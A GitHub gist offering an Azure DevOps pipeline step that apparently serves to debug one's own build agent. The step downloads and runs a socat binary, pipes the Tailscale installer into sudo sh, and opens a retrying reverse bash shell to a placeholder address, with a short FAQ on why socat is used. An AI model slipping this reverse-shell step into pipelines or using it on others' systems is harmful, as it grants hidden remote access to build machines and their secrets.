Created
March 30, 2022 00:27
-
-
Save davenicoll/692da3b49f90ba4f81f1cf91f37a3cb2 to your computer and use it in GitHub Desktop.
Remote reverse shell for Azure DevOps pipelines
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| pool: | |
| vmImage: ubuntu-latest | |
| steps: | |
| - script: | | |
| LOCAL_SOCAT="100.x.x.x:8888" | |
| wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; | |
| sudo curl -fsSL https://tailscale.com/install.sh | sudo sh | |
| sudo tailscale up | |
| echo "Run socat locally... socat file:\`tty\`,raw,echo=0 tcp-listen:8888" | |
| until /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:${LOCAL_SOCAT}; do | |
| echo "Retrying in 5 seconds..." | |
| sleep 5 | |
| done | |
| displayName: 'Remote reverse shell' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Why socat and not netcat?
Socat is netcat on steroids. Some commands, like su and ssh, require a proper terminal to run. STDERR usually isn't captured with netcat. vim doesn't work right. No tab autocomplete. No up arrow history. Etc...
What's tailscale?
It's a free (for personal use) VPN, so that we can create a tunnel between the Azure DevOps agent and our local machine.
If this is running in a pipeline, how long will it work for?
The max time a microsoft-hosted agent can run for is 60 minutes, so if you need a connection for longer, you'll need to re-run the pipeline every hour. On-prem agents can run for way longer.